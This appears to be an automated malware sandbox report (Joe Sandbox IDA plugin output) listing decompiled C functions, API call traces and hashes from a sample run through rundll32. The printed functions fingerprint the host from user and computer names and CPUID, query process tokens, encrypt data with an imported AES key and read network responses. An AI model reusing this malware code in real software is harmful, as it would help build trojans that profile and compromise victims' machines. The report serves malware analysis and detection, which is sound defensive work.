Associated: 00000000.00000002.462734832.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462762812.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462942782.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462949613.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462959460.0000000000417000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.463317477.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd

Similarity

API ID: BinaryType
String ID: .$E$T
API String ID: 3726996659-2084332913
Opcode ID: c9510c780543748d5cb8e05b81fc0676f7d2c1223e9e3b7a3d5ea3e1e48fedcd
Instruction ID: fd522592ae312fe0becddd2110b2b0399cdea5240c20d448f2d9dcb69bd5e890
Opcode Fuzzy Hash: c9510c780543748d5cb8e05b81fc0676f7d2c1223e9e3b7a3d5ea3e1e48fedcd
Instruction Fuzzy Hash: 683112B09043188BDB149F64D9553D97BF0AB15308F1481EEC8596B3E1D7BA8ACACF86

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5644, Parent PID: 6168COMMON

Executed Functions

Function 044B5FBB Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E044B5FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x44ba0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x44ba0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E044B6D63(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x44ba0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x44ba0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E044B6C2C(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x044b5fc4
0x044b5fca
0x044b5fcd
0x044b5fd3
0x044b5fd3
0x044b5fd5
0x044b5fd7
0x044b5fda
0x044b5fe0
0x044b5fe1
0x044b5fe2
0x044b5fe8
0x044b5fed
0x044b5ff3
0x044b5ffb
0x044b6158
0x044b6001
0x044b6003
0x044b600c
0x044b6011
0x044b6023
0x044b6026
0x044b602a
0x044b6031
0x044b6035
0x044b603d
0x044b6143
0x044b6043
0x044b6043
0x044b6047
0x044b6048
0x044b604a
0x044b6055
0x044b612f
0x044b605b
0x044b605b
0x044b605e
0x044b6064
0x044b606a
0x044b606a
0x044b6072
0x044b6074
0x044b6079
0x044b6120
0x044b607f
0x044b6085
0x044b6088
0x044b608b
0x044b608d
0x044b608e
0x044b6093
0x044b6095
0x044b6095
0x044b609f
0x044b60a4
0x044b60a7
0x044b60aa
0x044b60ac
0x044b60b5
0x044b60df
0x044b60b7
0x044b60c8
0x044b60c8
0x044b60e7
0x00000000
0x00000000
0x044b60e9
0x044b60ec
0x044b60ef
0x044b60f3
0x00000000
0x044b60f5
0x044b6104
0x044b610a
0x044b6112
0x044b6112
0x00000000
0x044b60f3
0x044b60f7
0x044b60fd
0x044b6102
0x044b6119
0x00000000
0x00000000
0x00000000
0x044b6102
0x044b6079
0x044b6132
0x044b6135
0x044b6135
0x044b614a
0x044b614a
0x044b6162

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044B24D8,00000001,044B58D7,00000000), ref: 044B5FF3
memcpy.NTDLL(044B24D8,044B58D7,00000010,?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740), ref: 044B600C
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 044B6035
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 044B604D
memcpy.NTDLL(00000000,7477C740,04E695B0,00000010), ref: 044B609F
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04E695B0,00000020,?,?,00000010), ref: 044B60C8
GetLastError.KERNEL32(?,?,00000010), ref: 044B60F7
GetLastError.KERNEL32 ref: 044B6129
CryptDestroyKey.ADVAPI32(00000000), ref: 044B6135
GetLastError.KERNEL32 ref: 044B613D
CryptReleaseContext.ADVAPI32(?,00000000), ref: 044B614A
GetLastError.KERNEL32(?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B6152

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: 59f88adef65fb5d5c1a8fe3d3eb39653252225539f922621b83668a215c465bb
Instruction ID: 2b6002f5de13f4ae612fb723f6409348febf249b5e29645e2b55cf173c9bf36c
Opcode Fuzzy Hash: 59f88adef65fb5d5c1a8fe3d3eb39653252225539f922621b83668a215c465bb
Instruction Fuzzy Hash: 74512DB1900208FFEF10DFA5D884AEE7BB9FB04341F01842AF945E6241D7759E14DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401308 Relevance: 13.6, APIs: 9, Instructions: 120
sleepnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401308(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E004010C4();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E004010A8(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E0040152A(_t57);
						}
					} while (_v8 != 0);
					_t27 = E0040197C(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E00402009(E00401BC9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E004020A9(_t53,  &_a4) != 0) {
					 *0x4041b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x4041b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E004010A8(_t60 + _t19);
				 *0x4041b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E0040152A(_t52);
				goto L18;
			}

0x0040130e
0x00401313
0x00401318
0x00401443
0x00401443
0x00401321
0x00401321
0x00401325
0x00401328
0x00401329
0x0040132f
0x00401333
0x0040136a
0x00401335
0x0040133d
0x00401343
0x00401345
0x0040134a
0x00401350
0x00401352
0x00401352
0x00401359
0x0040135f
0x0040135f
0x00401363
0x00401363
0x00401371
0x00401378
0x00401381
0x00401384
0x0040138a
0x0040138d
0x00401396
0x0040143f
0x00000000
0x00401441
0x0040139f
0x004013f0
0x004013f0
0x00401406
0x0040140a
0x00401432
0x0040140c
0x0040140f
0x00401415
0x0040141a
0x00401421
0x00401421
0x00401428
0x00401428
0x00401435
0x0040143b
0x0040143d
0x0040143d
0x00000000
0x0040143b
0x004013ac
0x004013ea
0x00000000
0x004013ea
0x004013ae
0x004013b3
0x004013ba
0x004013bc
0x004013c0
0x004013e2
0x004013e2
0x00000000
0x004013e2
0x004013c2
0x004013c7
0x004013cc
0x004013d3
0x00000000
0x00000000
0x004013d8
0x004013db
0x00000000

APIs

Part of subcall function 004010C4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401313), ref: 004010D3
Part of subcall function 004010C4: GetVersion.KERNEL32 ref: 004010E2
Part of subcall function 004010C4: GetCurrentProcessId.KERNEL32 ref: 004010FE
Part of subcall function 004010C4: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401117

Part of subcall function 004010A8: HeapAlloc.KERNEL32(00000000,?,0040132F,00000030,76D863F0,00000000), ref: 004010B4

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 0040133D
Sleep.KERNEL32(00000000,00000000,00000030,76D863F0,00000000), ref: 00401384
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004013BA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004013D8
WaitForSingleObject.KERNEL32(00000000,000000FF,00401BC9,?,00000000), ref: 0040140F
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00401421
CloseHandle.KERNEL32(00000000), ref: 00401428
GetLastError.KERNEL32(00401BC9,?,00000000), ref: 00401430
GetLastError.KERNEL32 ref: 0040143D

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
String ID:
API String ID: 3479304935-0
Opcode ID: 011c724f1e1ef679b4a9634cd0d9ed4f634c27a3dbcc4f0297eb3c5822c88b56
Instruction ID: f4196fe893bd33b1e9d5c3079516c57f955856417f1b88c1af068c445a7ec3dc
Opcode Fuzzy Hash: 011c724f1e1ef679b4a9634cd0d9ed4f634c27a3dbcc4f0297eb3c5822c88b56
Instruction Fuzzy Hash: 8831A671901215ABE720EFA58D849AF7AACEF45754F60413BF901F72E0D738DE4087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C83 Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401C83(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x4041c4;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0040221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x4041c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401c83
0x00401c8c
0x00401c90
0x00401c96
0x00401c9b
0x00401ca0
0x00401ca3
0x00401ca6
0x00401cab
0x00401cac
0x00401caf
0x00401cba
0x00401cc1
0x00401cc5
0x00401cc7
0x00401cc8
0x00401ccb
0x00401cd0
0x00401cda
0x00401cdc
0x00401cdc
0x00401cf0
0x00401cf6
0x00401cfa
0x00401d4a
0x00401cfc
0x00401d05
0x00401d1b
0x00401d23
0x00401d35
0x00401d39
0x00000000
0x00000000
0x00401d25
0x00401d28
0x00401d2d
0x00401d2f
0x00401d2f
0x00401d10
0x00401d12
0x00401d3b
0x00401d3c
0x00401d3c
0x00401d05
0x00401d52

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?,?), ref: 00401C90
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401CA6
_snwprintf.NTDLL ref: 00401CCB
CreateFileMappingW.KERNELBASE(000000FF,004041C8,00000004,00000000,?,?), ref: 00401CF0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D07
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401D1B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D33
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A), ref: 00401D3C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D44

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: f52db384039304a089c71cd12dbd25e9578601f9327d946e205e13936b57b162
Instruction ID: 934acb93e0c2ecb47cadd57b2bdad6ee31a2ab6ba8ec4c39c125d8047e805e61
Opcode Fuzzy Hash: f52db384039304a089c71cd12dbd25e9578601f9327d946e205e13936b57b162
Instruction Fuzzy Hash: B721A4B2500104BFD710AFA4DD88EAE7BBCEB48355F10407AF605F71E0D67899418B68

Uniqueness

Uniqueness Score: -1.00%

Function 044B3365 Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E044B3365(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x44ba310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E044B2119( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x44ba344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x44ba2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E044B708D(_v8 + _v8, _t64);
							}
							HeapFree( *0x44ba2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x44ba2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E044B708D(_v8 + _v8, _t64);
						}
						HeapFree( *0x44ba2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x044b3365
0x044b336d
0x044b3371
0x044b3374
0x044b3379
0x044b337b
0x044b3380
0x044b3380
0x044b3386
0x044b3388
0x044b3395
0x044b33f6
0x044b3397
0x044b339c
0x044b33a2
0x044b33a7
0x044b33b5
0x044b33b9
0x044b33c8
0x044b33cf
0x044b33d6
0x044b33d6
0x044b33e1
0x044b33e1
0x044b33b9
0x044b33a7
0x044b33f8
0x044b33fe
0x044b3408
0x044b340a
0x044b340f
0x044b341e
0x044b3422
0x044b342d
0x044b3434
0x044b343b
0x044b343b
0x044b3447
0x044b3447
0x044b3422
0x044b3452
0x044b3454
0x044b3457
0x044b3459
0x044b345c
0x044b345f
0x044b3469
0x044b346d
0x044b3471

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 044B339C
RtlAllocateHeap.NTDLL(00000000,?), ref: 044B33B3
GetUserNameW.ADVAPI32(00000000,?), ref: 044B33C0
HeapFree.KERNEL32(00000000,00000000), ref: 044B33E1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B3408
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 044B341C
GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B3429
HeapFree.KERNEL32(00000000,00000000), ref: 044B3447

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: ec2630ddae57a67a53b9272df07228e7228c7ca1e397502e2bf7729855b1151a
Instruction ID: 44915c915179a59fb07d510d899b0bd62f092c9268a3566a455f731244935765
Opcode Fuzzy Hash: ec2630ddae57a67a53b9272df07228e7228c7ca1e397502e2bf7729855b1151a
Instruction Fuzzy Hash: 16313C71A00705EFEB10DFAADC81AAFB7F9FB48200F50446AE945E3211DB34ED019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4321 Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E044B4321(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E044B6D63(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E044B6C2C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x044b432e
0x044b432f
0x044b4330
0x044b4331
0x044b4332
0x044b4336
0x044b433d
0x044b434c
0x044b434f
0x044b4352
0x044b4359
0x044b435c
0x044b435f
0x044b4362
0x044b4365
0x044b4370
0x044b4372
0x044b437b
0x044b4383
0x044b4385
0x044b4397
0x044b43a1
0x044b43a5
0x044b43b4
0x044b43b8
0x044b43c1
0x044b43c9
0x044b43c9
0x044b43cb
0x044b43cb
0x044b43d3
0x044b43d9
0x044b43dd
0x044b43dd
0x044b43e8

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 044B4368
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 044B437B
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B4397

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B43B4
memcpy.NTDLL(?,00000000,0000001C), ref: 044B43C1
NtClose.NTDLL(?), ref: 044B43D3
NtClose.NTDLL(00000000), ref: 044B43DD

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: dd511d909298e2296e7a6c57c686812baaf93b62f76d83a44891e700505dd2b8
Instruction ID: 32faa1f433bd80762f97f238e4d8d63173572ad01f9320b41faf0f36a20e9294
Opcode Fuzzy Hash: dd511d909298e2296e7a6c57c686812baaf93b62f76d83a44891e700505dd2b8
Instruction Fuzzy Hash: 1E21E9B1900619BBEF019F95CC85ADEBFBDEF08740F108016FA05E6111D7B19A559BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B1CA5 Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E044B1CA5(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x44ba174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E044B6D63(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E044B6E40( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E044B6C2C(_v16);
										if(_t64 == 0) {
											_t64 = E044B15CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E044B6E40( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E044B4A85(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x044b1ca5
0x044b1ca6
0x044b1cac
0x044b1cb7
0x044b1cb7
0x044b1cb9
0x044b7395
0x044b739a
0x044b739c
0x044b73b3
0x044b73e4
0x044b73e9
0x044b74ac
0x044b73ef
0x044b73f6
0x044b73fe
0x044b74a9
0x044b7404
0x044b7409
0x044b740e
0x044b7413
0x044b749b
0x044b7419
0x044b7419
0x044b741b
0x044b7421
0x044b7422
0x044b7422
0x044b7425
0x044b7428
0x044b742e
0x044b743f
0x044b7447
0x00000000
0x00000000
0x044b744f
0x044b7457
0x044b7463
0x044b7467
0x044b7469
0x044b746e
0x00000000
0x00000000
0x044b746e
